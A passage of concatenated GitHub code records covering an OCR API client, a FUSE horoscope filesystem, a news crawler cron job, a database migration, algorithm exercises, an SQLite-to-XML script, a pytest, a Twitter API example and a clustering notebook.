image2base64,\n \"language_type\": kwargs[\"lang\"],\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __accurate_basic(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"accurate_basic\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __accurate(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"accurate\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __web_image(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"web_image\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64\n }\n\n return post_request(ocr_url, params, data).json()\n\n def get_ocr(self, api=\"general_basic\", **kwargs):\n return self.api_list[api](kwargs)\n\n\nclass TxOcr:\n def __init__(self, _id, _key):\n self.app_id = _id\n self.app_key = _key\n self.general_ocr_url = Global.config.get_value(\"tx_general_ocr_url\")\n\n def __del__(self):\n print(\"TxOcr has been destroyed.\")\n\n @staticmethod\n def __generate_signature(_params, _app_key):\n _sorted_keys = sorted(_params.keys())\n _str = \"\"\n for _key in _sorted_keys:\n if _params[_key] == \"\":\n continue\n _str += urllib.parse.urlencode({_key: _params[_key]}) + \"&\"\n _str += \"app_key=\" + _app_key\n return hashlib.md5(_str.encode(\"utf-8\")).hexdigest().upper()\n\n def get_ocr(self, image):\n data = dict({\n \"app_id\": self.app_id,\n \"time_stamp\": int(time.time()),\n \"nonce_str\": uuid.uuid4().hex,\n \"image\": base64.b64encode(get_file_content(image))\n })\n\n data[\"sign\"] = self.__generate_signature(data, self.app_key)\n return post_request(self.general_ocr_url, None, data).json()\n","repo_name":"drsanwujiang/video-timeline-and-subtitle-extract","sub_path":"ocrapi.py","file_name":"ocrapi.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"32"} +{"seq_id":"42562861944","text":"import os\nimport sys\nimport bs4\nimport fuse\nimport tempfile\nimport requests\nimport textwrap\nimport argparse\n\n\n# Name must match the class that implements it.\n# Each of these will be a directory under the mountpoint.\nhoroscope_sites = ['Astrosage', 'Astroyogi', 'AstroyogiCareer', 'IndianAstrology2000']\n\n# Each of these will be a file under the directory\n# corresponding to the horoscope site.\nhoroscope_types = ['daily', 'weekly', 'monthly']\n\n# Default string to be displayed when unable to load page.\nNA = b\"Not available\\n\"\n\n\nclass Req(object):\n \"\"\"Get HTML page using requests and parse it using BeautifulSoup\"\"\"\n\n def __init__(self):\n super().__init__()\n\n\n def _get(self, url, timeout=30):\n try:\n response = requests.get(url, timeout=timeout)\n response.raise_for_status()\n return bs4.BeautifulSoup(response.text, \"html.parser\")\n except:\n return None\n\n\nclass Astrosage(Req):\n \"\"\"Horoscopes from www.astrosage.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"http://www.astrosage.com/horoscope/\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = 
\"{}/{}-{}-horoscope.asp\"\n url = url.format(base_url, horoscope_type, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url, horoscope_type)\n\n\n def _parse_html(self, url, horoscope_type):\n soup = self._get(url)\n if soup:\n if horoscope_type == \"daily\":\n html_class_attr = \"ui-large-content-box\"\n else:\n html_class_attr = \"ui-sign-content-box\"\n content = soup.find(class_=html_class_attr).text\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass Astroyogi(Req):\n \"\"\"Horoscopes from www.astroyogi.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.astroyogi.com/horoscopes\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = \"{}/{}/{}-free-horoscope.aspx\"\n url = url.format(base_url, horoscope_type, sunsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(id=\"ContentPlaceHolder1_LblPrediction\").contents[0]\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass AstroyogiCareer(Req):\n \"\"\"Career horoscopes from www.astroyogi.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.astroyogi.com/horoscopes\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = \"{}/{}/{}-career-horoscope.aspx\"\n url = url.format(base_url, horoscope_type, sunsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(id=\"ContentPlaceHolder1_LblPrediction\").contents[0]\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass IndianAstrology2000(Req):\n \"\"\"Horoscopes from www.indianastrology2000.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.indianastrology2000.com/horoscope\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n if horoscope_type == \"daily\":\n url = \"{}/index.php?zone=3&sign={}\"\n url = url.format(base_url, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n elif horoscope_type == \"weekly\":\n # No weekly horoscope available.\n self.horoscope[horoscope_type] = NA\n elif horoscope_type == \"monthly\":\n url = \"{}/{}-monthly-horoscope.html\"\n url = url.format(base_url, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(class_=\"horoscope-sign-content-block\").text\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass HoroscopeFS(fuse.Operations):\n \"\"\"Virtual filesystem for aggregating horoscopes from various websites\"\"\"\n\n def __init__(self, sunsign, moonsign):\n # Get default stats for an empty directory and empty file.\n # The temporary directory and file are automatically deleted.\n with tempfile.TemporaryDirectory() as tmp_dir:\n self.stat_dict_dir = \\\n self._convert_stat_to_dict(os.lstat(tmp_dir))\n\n with tempfile.NamedTemporaryFile() as tmp_file:\n self.stat_dict_file = \\\n self._convert_stat_to_dict(os.lstat(tmp_file.name))\n\n self.sunsign = sunsign\n self.moonsign = moonsign\n self.dot_dirs = ['.', '..']\n self.current_module = sys.modules[__name__]\n self.horoscope_objs = {}\n\n\n # Given a 
'stat_result' object, convert it into a Python dictionary.\n    def _convert_stat_to_dict(self, stat_result):\n        stat_keys = ('st_atime', 'st_ctime', 'st_gid', 'st_mode',\n                     'st_mtime', 'st_nlink', 'st_size', 'st_uid')\n\n        return dict((key, getattr(stat_result, key)) for key in stat_keys)\n\n\n    # Create an object on-demand for the horoscope site we are looking at\n    # if the object has not already been created.\n    def _construct_obj_from_path(self, path):\n        horoscope_site, _ = path.split(os.sep)[1:3]\n        if not self.horoscope_objs.get(horoscope_site, None):\n            obj = getattr(self.current_module, horoscope_site)(self.sunsign, self.moonsign)\n            self.horoscope_objs[horoscope_site] = obj\n\n\n    # Get the size of the file corresponding to the given path.\n    # Path is a string of the form /<horoscope_site>/<horoscope_type>\n    def _get_file_size_from_path(self, path):\n        horoscope_site, horoscope_type = path.split(os.sep)[1:3]\n        horoscope_obj = self.horoscope_objs[horoscope_site]\n        return len(horoscope_obj.horoscope[horoscope_type])\n\n\n    # Read data from the given file path.\n    # Path is a string of the form /<horoscope_site>/<horoscope_type>\n    def _read_data_from_path(self, path, length, offset):\n        horoscope_site, horoscope_type = path.split(os.sep)[1:3]\n        horoscope_obj = self.horoscope_objs[horoscope_site]\n        return horoscope_obj.horoscope[horoscope_type][offset : offset+length]\n\n\n    def getattr(self, path, fh=None):\n        if any(map(path.endswith, horoscope_sites)):\n            # For directories corresponding to the horoscope websites,\n            # return the default stats for directory.\n            return self.stat_dict_dir\n        elif any(map(path.endswith, horoscope_types)):\n            # Fetch content from the horoscope site we are looking at on-demand.\n            self._construct_obj_from_path(path)\n\n            # For files corresponding to the horoscope types,\n            # return the stats for the file with st_size set appropriately.\n            stat = dict(self.stat_dict_file) # Create a copy before modifying\n            stat['st_size'] = self._get_file_size_from_path(path)\n            return stat\n        else:\n            # For all other files/directories, return the stats from the OS.\n            return self._convert_stat_to_dict(os.lstat(path))\n\n\n    def readdir(self, path, fh):\n        if any(map(path.endswith, horoscope_sites)):\n            # Each horoscope website directory contains one file for each\n            # horoscope type.\n            return self.dot_dirs + horoscope_types\n        else:\n            # Top level directory (mountpoint) contains one directory for each\n            # horoscope website.\n            return self.dot_dirs + horoscope_sites\n\n\n    def read(self, path, length, offset, fh):\n        return self._read_data_from_path(path, length, offset)\n\n\ndef main(mountpoint, sunsign, moonsign):\n    fuse.FUSE(HoroscopeFS(sunsign, moonsign),\n              mountpoint,\n              nothreads=True,\n              foreground=True)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"mountpoint\", help=\"Mount point for the Virtual File System\")\n    parser.add_argument(\"sunsign\", help=\"Your sun sign\")\n    parser.add_argument(\"moonsign\", help=\"Your moon sign\")\n    args = parser.parse_args()\n\n    main(args.mountpoint, args.sunsign.lower(), args.moonsign.lower())\n","repo_name":"varunbpatil/HoroscopeFS","sub_path":"horoscopeFS.py","file_name":"horoscopeFS.py","file_ext":"py","file_size_in_byte":8840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"26471392227","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom django_cron import CronJobBase, Schedule\n\nfrom crawler.models import Article\n\n\nclass CrawlerCronJob(CronJobBase):\n    RUN_EVERY_MIN = 10\n\n    
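# django_cron runs do() on this schedule, i.e. every RUN_EVERY_MIN minutes.\n    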
schedule = Schedule(run_every_mins=RUN_EVERY_MIN)\n    code = 'crawler.jobs.crawler_cron_job'\n\n    @staticmethod\n    def do():\n        page = BeautifulSoup(requests.get(\"https://www.lindaikejisblog.com/\").text, 'html.parser')\n        html_articles = page.select(\".main_board article\")\n        html_articles.reverse()\n\n        for html_article in html_articles:\n            title = html_article.select(\".story_title a\")[0].text.strip()\n            url = html_article.select(\".story_title a\")[0].get('href')\n            image_url = html_article.select(\"img\")[0].get('src')\n            snippet = html_article.select(\".story_description\")[0].text.strip()\n\n            if not Article.objects.filter(url=url).exists():\n                article = Article(title=title, url=url, image_url=image_url, snippet=snippet)\n                try:\n                    article.save()\n                except Exception as e:\n                    print(e)\n","repo_name":"acefalobi/linda-crawler-api","sub_path":"src/crawler/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"11684553695","text":"\"\"\"add nodes and edges for graphs with missing nodes/edges in database\n\nSome of the graphs don't have their nodes and edges in the node/edge tables. This script creates the missing node and edge rows in the respective tables.\n\nRevision ID: 7df7ee83a212\nRevises: c4c8fd40b021\nCreate Date: 2017-03-10 10:54:51.546356\n\n\"\"\"\nimport json\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nfrom graphspace_python.graphs.formatter.json_formatter import CyJSFormat\n\nrevision = '7df7ee83a212'\ndown_revision = 'c4c8fd40b021'\nbranch_labels = None\ndepends_on = None\n\ngraphhelper = sa.Table(\n\t'graph',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('graph_json', sa.String)\n)\n\nnodehelper = sa.Table(\n\t'node',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('label', sa.String),\n\tsa.Column('name', sa.String),\n\tsa.Column('graph_id', sa.Integer),\n)\n\nedgehelper = sa.Table(\n\t'edge',\n\tsa.MetaData(),\n\tsa.Column('id', sa.Integer, primary_key=True),\n\tsa.Column('name', sa.String),\n\tsa.Column('head_node_id', sa.Integer),\n\tsa.Column('tail_node_id', sa.Integer),\n\tsa.Column('tail_node_name', sa.String),\n\tsa.Column('head_node_name', sa.String),\n\tsa.Column('tail_node_label', sa.String),\n\tsa.Column('head_node_label', sa.String),\n\tsa.Column('graph_id', sa.Integer),\n\tsa.Column('is_directed', sa.Integer),\n)\n\n\ndef add_node(connection, name, label, graph_id):\n\tres = connection.execute(nodehelper.insert().values(name=name, label=label, graph_id=graph_id))\n\tnode_id = res.inserted_primary_key\n\tfor node in connection.execute(nodehelper.select().where(nodehelper.c.id==node_id[0])):\n\t\treturn node.id, node.name, node.label\n\n\ndef add_graph_nodes(connection, graph_id, nodes):\n\tnode_name_to_id_map = dict()\n\tnode_id_to_label_map = dict()\n\n\tfor node in nodes:\n\t\t# Add node to table\n\t\tid, name, label = add_node(connection, name=node[0], label=node[1]['data']['label'], graph_id=graph_id)\n\t\tnode_name_to_id_map[name] = id\n\t\tnode_id_to_label_map[id] = label\n\treturn node_name_to_id_map, node_id_to_label_map\n\n\ndef add_edge(connection, name, head_node_id, tail_node_id, tail_node_name, head_node_name, tail_node_label,\n             head_node_label, is_directed, graph_id):\n\t
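# Node names and labels are stored denormalized on each edge row.\n\t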
connection.execute(edgehelper.insert().values(\n\t\tname=name,\n\t\thead_node_id=head_node_id,\n\t\ttail_node_id=tail_node_id,\n\t\ttail_node_name=tail_node_name,\n\t\thead_node_name=head_node_name,\n\t\ttail_node_label=tail_node_label,\n\t\thead_node_label=head_node_label,\n\t\tis_directed=is_directed,\n\t\tgraph_id=graph_id))\n\n\ndef add_graph_edges(connection, graph_id, edges, node_name_to_id_map, node_id_to_label_map):\n\tedge_name_to_id_map = dict()\n\tfor edge in edges:\n\t\tis_directed = 0 if 'is_directed' not in edge[2]['data'] else 1 if edge[2]['data']['is_directed'] else 0\n\n\t\t# To make sure ints and floats are also accepted as source and target nodes of an edge\n\t\tadd_edge(connection,\n\t\t         graph_id=graph_id,\n\t\t         head_node_id=str(node_name_to_id_map[edge[1]]),\n\t\t         tail_node_id=str(node_name_to_id_map[edge[0]]),\n\t\t         head_node_name=str(edge[1]),\n\t\t         tail_node_name=str(edge[0]),\n\t\t         head_node_label=str(node_id_to_label_map[node_name_to_id_map[edge[1]]]),\n\t\t         tail_node_label=str(node_id_to_label_map[node_name_to_id_map[edge[0]]]),\n\t\t         name=str(edge[2]['data']['name']),\n\t\t         is_directed=is_directed)\n\n\ndef upgrade():\n\tconnection = op.get_bind()\n\tgraph_ids = set()\n\n\tfor graph in connection.execute(graphhelper.select().distinct(graphhelper.c.id)):\n\t\tgraph_ids.add(graph.id)\n\n\tgraphs_with_elements = set()\n\n\tfor node in connection.execute(nodehelper.select().distinct(nodehelper.c.graph_id)):\n\t\tgraphs_with_elements.add(node.graph_id)\n\n\tgraph_ids.difference_update(graphs_with_elements)\n\n\tfor edge in connection.execute(edgehelper.select().distinct(edgehelper.c.graph_id)):\n\t\tgraphs_with_elements.add(edge.graph_id)\n\n\tgraph_ids.difference_update(graphs_with_elements)\n\n\tfor graph in connection.execute(graphhelper.select().where(graphhelper.c.id.in_(graph_ids))):\n\t\tprint(graph.id)\n\t\tG = CyJSFormat.create_gsgraph(graph.graph_json)\n\t\t# Add graph nodes\n\t\tnode_name_to_id_map, node_id_to_label_map = add_graph_nodes(connection, graph.id, G.nodes(data=True))\n\t\t# Add graph edges\n\t\tedge_name_to_id_map = add_graph_edges(connection, graph.id, G.edges(data=True), node_name_to_id_map,\n\t\t                                      node_id_to_label_map)\n\n\ndef downgrade():\n\tpass\n","repo_name":"Murali-group/GraphSpace","sub_path":"migration/versions/7df7ee83a212_add_nodes_and_egdes_for_graphs_with_.py","file_name":"7df7ee83a212_add_nodes_and_egdes_for_graphs_with_.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"}
{"seq_id":"19780135502","text":"def solution(n, edge):\n    from collections import defaultdict\n\n    # defaultdict removes the need to sort the adjacency lists\n    li = defaultdict(list)\n\n    # store each edge in both directions (undirected graph)\n    for i in edge:\n        li[i[0]].append(i[1])\n        li[i[1]].append(i[0])\n\n    search = [1] # the traversal starts from node 1\n    check=[0 for i in range(n+1)] # array tracking how many edges away from node 1 each node is\n    check[1]=1 # mark the first node so it is never revisited\n\n    
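# The list acts as a BFS queue: iterating while appending visits nodes level by level.\n    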
for i in search:\n        for j in li[i]:\n\n            # for an unvisited node, distance = previous node's distance + 1\n            # using 'j not in search' made the scan far too slow and timed out (up to 50000 edges)\n            if check[j]==0:\n                search.append(j)\n                check[j] = check[i] + 1\n\n    # count the nodes that are the farthest away\n    return check.count(max(check))\n","repo_name":"YAEJIN-JEONG/Algorithm","sub_path":"프로그래머스/Lv3. 가장 먼 노드/동혁/Lv3. 가장 먼 노드.py","file_name":"Lv3. 가장 먼 노드.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
{"seq_id":"18004302501","text":"# https://leetcode.com/problems/pascals-triangle-ii/\n\nclass Solution(object):\n    def getRow(self, rowIndex):\n        \"\"\"\n        :type rowIndex: int\n        :rtype: List[int]\n        \"\"\"\n        if rowIndex == 0:\n            return [1]\n        res = [1,1]\n        for i in range(rowIndex-1):\n            left, right = 0, 0\n            while right < len(res):\n                left, res[right] = res[right], res[right] + left\n                print(res)\n                right+=1\n            res.append(1)\n        return res","repo_name":"Shubratha/practice","sub_path":"Misc/pasals.py","file_name":"pasals.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"13169656869","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n-------------------------------------------------\nFile Name: 3. buildTree\nDescription : \nAuthor : wellqin\ndate: 2020/3/19\nChange Activity: 2020/3/19\n[105] Construct Binary Tree from Preorder and Inorder Traversal: preorder plus inorder uniquely determines a binary tree\n[106] Construct Binary Tree from Inorder and Postorder Traversal: inorder plus postorder uniquely determines a binary tree\n[606] Construct String from Binary Tree: build a string from a binary tree\n-------------------------------------------------\n\"\"\"\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\n\"\"\"\nIn one sentence: when you see a tree, think recursion.\n\npreorder is root -> left -> right\ninorder is left -> root -> right\npreorder[0] is the root of the whole tree; if preorder[0] = inorder[k], then the part of inorder before index k is the left subtree and the rest is the right subtree\n\"\"\"\n\n\nclass Solution(object):\n    def buildTree(self, preorder, inorder):\n        \"\"\"\n        :type preorder: List[int]\n        :type inorder: List[int]\n        :rtype: TreeNode\n        \"\"\"\n        if not preorder or len(preorder) == 0:\n            return None\n\n        root = TreeNode(preorder[0])\n        k = inorder.index(preorder[0])  # position of the root in inorder\n\n        root.left = self.buildTree(preorder[1:k + 1], inorder[0:k])\n        root.right = self.buildTree(preorder[k + 1:], inorder[k + 1:])\n        return root\n\n\n    \"\"\"\n    inorder is left -> root -> right\n    postorder is left -> right -> root\n    \"\"\"\n\n    def buildTree1(self, inorder, postorder):\n        \"\"\"\n        :type inorder: List[int]\n        :type postorder: List[int]\n        :rtype: TreeNode\n        \"\"\"\n        if not inorder or len(inorder) == 0:\n            return None\n        root = TreeNode(postorder[-1])\n        k = inorder.index(postorder[-1])  # position of the root in inorder\n\n        root.left = self.buildTree1(inorder[:k], postorder[:k])\n        root.right = self.buildTree1(inorder[k + 1:], postorder[k:-1])\n        return root\n\n    def tree2str(self, t: TreeNode) -> str:\n        result = ''  # defined in the enclosing function; the helper rebinds it via nonlocal\n\n        def Helper(root):\n            nonlocal result  # nonlocal only works in a nested function: define the name outside, declare it nonlocal inside\n            if not root:\n                return None\n            left = Helper(root.left)\n            right = Helper(root.right)\n\n            if left and right:\n                result = str(root.val) + '(' + str(left) + ')' + '(' + str(right) + ')'\n            elif not left and right:\n                result = str(root.val) + '()' + '(' + str(right) + ')'\n            elif left and not right:\n                result = str(root.val) + '(' + str(left) + ')'\n            else:\n                result = str(root.val)\n            return result\n\n        Helper(t)\n        return result\n\n","repo_name":"wellqin/USTC","sub_path":"DataStructure/二叉树/LT-problem/4.buildTree.py","file_name":"4.buildTree.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"38564927534","text":"'''\nEvery matrix-chain product can be split into products of smaller chains; the task is to find\nthe split with the minimum multiplication cost.\nAi denotes the i-th matrix, with dimensions p(i-1) x p(i).\nWhen dividing into subproblems, a chain of length n is always computed from two subchains of\nlengths i and j with i + j = n, and each subchain must itself be a minimum-cost chain.\n\nThe cases are:\n1. A chain of length 1 (a single matrix) costs 0,\n   so the costs to build up start from chain length 2 and go up to length n.\n2. For a chain of length L, the cost is determined by the start position i, the end position j,\n   and the best split point k in between, giving:\n   m[i, j] = m[i, k] + m[k+1, j] + pi*pk*pj\n   (m is a table storing the cost between two positions; p holds the matrix row sizes)\n'''\n\nNULLFLAG = float('inf')\n\n
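# cost[i][j] holds the cheapest cost for multiplying the chain i..j; bestShot[i][j] records the split k that achieved it.\n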
def MatrixChainOrder(matrix):\n    matrixNum = len(matrix)\n    cost = []\n    bestShot = []\n    for i in range(matrixNum):\n        cost.append([0] * matrixNum)\n        bestShot.append([0] * matrixNum)\n\n    # ccl: current chain length, i.e. the length of the chain being optimized\n    for ccl in range(2, matrixNum+1):\n        # i is the start matrix of the current chain, from the 1st matrix up to matrixNum-ccl+1\n        for i in range(matrixNum-ccl+1):\n            # j is the end position\n            j = i + ccl - 1\n            cost[i][j] = NULLFLAG\n            # k scans the candidate split points between i and j\n            for k in range(i, j):\n                tempCost = cost[i][k] + cost[k+1][j] + matrix[i][0] * matrix[k][1] * matrix[j][1]\n\n                if tempCost < cost[i][j]:\n                    cost[i][j] = tempCost\n                    bestShot[i][j] = k\n    return cost, bestShot\n\ndef printParens(bestShot, i, j):\n    if i == j:\n        print(\"A\", i, end=\"\")\n    else:\n        print(\"(\", end='')\n        k = bestShot[i][j]\n        printParens(bestShot, i, k)\n        printParens(bestShot, k+1, j)\n        print(\")\", end='')\n\n\nif __name__ == '__main__':\n    Matrix = [\n        [30, 35],\n        [35, 15],\n        [15, 5],\n        [5, 10],\n        [10, 20],\n        [20, 25],\n    ]\n    cost, bestShot = MatrixChainOrder(Matrix)\n    print(cost)\n    print(bestShot)\n\n    printParens(bestShot, 0, 5)\n\n\n","repo_name":"whisperH/AlgorithmsAndMeachineLearning","sub_path":"DynamicProgramming/MutiplyMatrix.py","file_name":"MutiplyMatrix.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
{"seq_id":"6796000461","text":"import sqlite3\r\nimport xml.etree.ElementTree as ET\r\n\r\n# Connect to the database\r\nconn = sqlite3.connect('C:/sdk/Sqlite/prueba.db')\r\n\r\n# Create a cursor\r\nc = conn.cursor()\r\n\r\n# Query each team's goals at home and away\r\nc.execute('SELECT EquipoLocal, SUM(golesLocal) FROM partidos GROUP BY EquipoLocal')\r\ngoles_local = dict(c.fetchall())\r\nc.execute('SELECT EquipoVisitante, SUM(golesVisitante) FROM partidos GROUP BY EquipoVisitante')\r\ngoles_visitante = dict(c.fetchall())\r\n\r\n# Find the teams that scored more goals away than at home\r\nequipos_visitante = [equipo for equipo in goles_visitante.keys() if equipo in goles_local.keys() and goles_visitante[equipo] > goles_local[equipo]]\r\n\r\n# Create the root element of the XML file\r\nroot = ET.Element('resultados')\r\n\r\n# Create elements and add them to the tree if any such teams exist\r\nif len(equipos_visitante) > 0:\r\n    for equipo in equipos_visitante:\r\n        resultado = ET.SubElement(root, 'resultado')\r\n        resultado.set('equipo', equipo)\r\n        resultado.set('visitante', 'si')\r\nelse:\r\n    resultado = ET.SubElement(root, 'resultado')\r\n    resultado.set('equipo', 'No hay equipos que hayan metido más goles como visitante que como local')\r\n    \r\n# Write the XML file\r\ntree = ET.ElementTree(root)\r\ntree.write('equipos_visitante.xml')\r\n\r\n
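# Note: ElementTree.write() defaults to US-ASCII with no XML declaration; pass encoding='utf-8', xml_declaration=True if the accented team names need it.\r\n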
# Show the results\r\nif len(equipos_visitante) > 0:\r\n    print('Los siguientes equipos han metido más goles como visitante que como local:')\r\n    for equipo in equipos_visitante:\r\n        print(f'- {equipo}')\r\nelse:\r\n    print('No hay equipos que hayan metido más goles como visitante que como local')\r\n\r\n# Close the connection\r\nconn.close()\r\n","repo_name":"MartaMolinaGutierrez/BBDDAA","sub_path":"XML2_/queries/query4.py","file_name":"query4.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"73328920410","text":"# -*- coding: utf-8 -*-\n\"\"\"\nmodule author: Long Hao \n\"\"\"\n\n# Import built-in modules\nimport os\n\n# Import local modules\nfrom nukescripts_builder.core import build_nukescripts\n\n\ndef test_build_nukescripts(tmpdir):\n    source_string = \"\"\"\nRead {\n    inputs 0\n    #if $getVar('file_type', ''):\n    file_type $file_type\n    #end if\n    file $read_file\n    origset true\n    name Read1\n    selected true\n    xpos 54\n    ypos -162\n}\nOCIOColorSpace {\n    in_colorspace linear\n    out_colorspace linear\n    name OCIOColorSpace1\n    selected true\n    xpos 54\n    ypos -47\n}\nWrite {\n    file $write_file\n    name Write1\n    selected true\n    xpos 54\n    ypos -6\n    }\n\"\"\"\n    file_path = 'Y:/113803nya2022gg2pe65ka.jpg'\n    write_file = 'c:/test.exr'\n    output_path = str(tmpdir.join('test.nk'))\n    build_nukescripts(template=source_string, output_path=output_path, data={\n        'read_file': file_path,\n        'write_file': write_file\n    })\n    assert os.path.isfile(output_path)\n    with open(output_path, 'r') as file_obj:\n        # Read once: a second read() on an exhausted handle returns '' and makes the assertion vacuous.\n        content = file_obj.read()\n        assert 'file {}'.format(file_path) in content\n        assert 'file_type' not in content\n","repo_name":"loonghao/nukescripts_builder","sub_path":"nukescripts_builder/test/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
{"seq_id":"26889751790","text":"import requests\nimport tweepy\n\n\"\"\"\n#### v2 with Requests\nVersion 2 of the Twitter API has an updated set of endpoints and more functionalities.\n If you can get an API key in the Academic Research track, it allows you to search for tweets posted\n at any point in the past (no other method allows you to do that).\n It is more volume-restricted than v1.1 though.\n The standard track is limited to 0.5M tweets per month, the Elevated track to 2M per month,\nand the Academic Research track is limited to 10M per month.\n\n\"\"\"\n\n# API v2 endpoint for recent tweets search\nendpoint_url = 'https://api.twitter.com/2/tweets/search/recent'\n\n# authentication\nheaders = {'Authorization': f'Bearer {bearer_token}'}\n\n# API v2 allows you to specify the fields to be returned\ntweet_fields = ['author_id', 'created_at', 'id', 'text', 'withheld']\ntweet_fields = ','.join(tweet_fields)\nuser_fields = ['created_at', 'description', 'id', 'location', 'name', 'username']\nuser_fields = ','.join(user_fields)\n\nquery = 'ukraine'\nquery_params = {'query': query,\n                'tweet.fields': tweet_fields,\n                'user.fields' : user_fields,\n                'max_results': 10,\n                }\nresponse = requests.request('GET', endpoint_url, headers=headers, params=query_params)\nresponse.json()['data']\n\n\n\n###### v2 with Tweepy####\n\nclass MyStreamV2(tweepy.StreamingClient):\n    def on_data(self, data):\n        print(data)\n\nstream = MyStreamV2(bearer_token)\nstream.sample()\n","repo_name":"ResitKadir1/03_APIs","sub_path":"Twitter_api2.py","file_name":"Twitter_api2.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"37528395215","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.cluster.hierarchy as sch\n
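# sch supplies linkage() and dendrogram() for the hierarchical-clustering section below.\n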
from sklearn.cluster import AgglomerativeClustering\n\n\n# In[4]:\n\n\ndata=pd.read_excel('EastWestAirlines.xlsx',sheet_name='data')\n\n\n# In[5]:\n\n\ndata\n\n\n# In[7]:\n\n\ndata.info()\n\n\n# In[8]:\n\n\ndata.isna().sum()\n\n\n# In[9]:\n\n\n# Replace any row that contains a non-integer value with NaN\ndef check_int(df):\n    count = 0\n    for row in df.itertuples(index=False):\n        if not all(isinstance(value, (int, np.integer)) for value in row):\n            df.loc[count] = np.nan\n        count += 1\n\n\n# In[12]:\n\n\ncheck_int(data[data.columns])\n\n\n# In[14]:\n\n\ndata.describe().transpose()\n\n\n# In[21]:\n\n\n# Checking previously awarded miles ratio\ndata['Award?'].value_counts().plot(kind='pie', autopct='%2.0f%%', fontsize='18', \n                                   colors = ['#F11A05','#43E206'], shadow =True)\nplt.show()\n\n\n# In[22]:\n\n\n# Checking the relation between Balance and Days_since_enroll\nimport seaborn as sns\nfig, ax =plt.subplots(figsize=(40,12))\nax = sns.lineplot(x= 'Days_since_enroll', y='Balance',data = data)\n\n\n# In[20]:\n\n\n# Agglomerative Clustering\ndata1 = data.drop('ID#', axis = 1)\ndata1.head()\n\n\n# In[24]:\n\n\n# import libraries\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[25]:\n\n\n\n\n# We will check clustering for two different scaling functions\nscaler1 = MinMaxScaler()\nscaler2 = StandardScaler()\n\n\n# In[26]:\n\n\n# Normalizing the 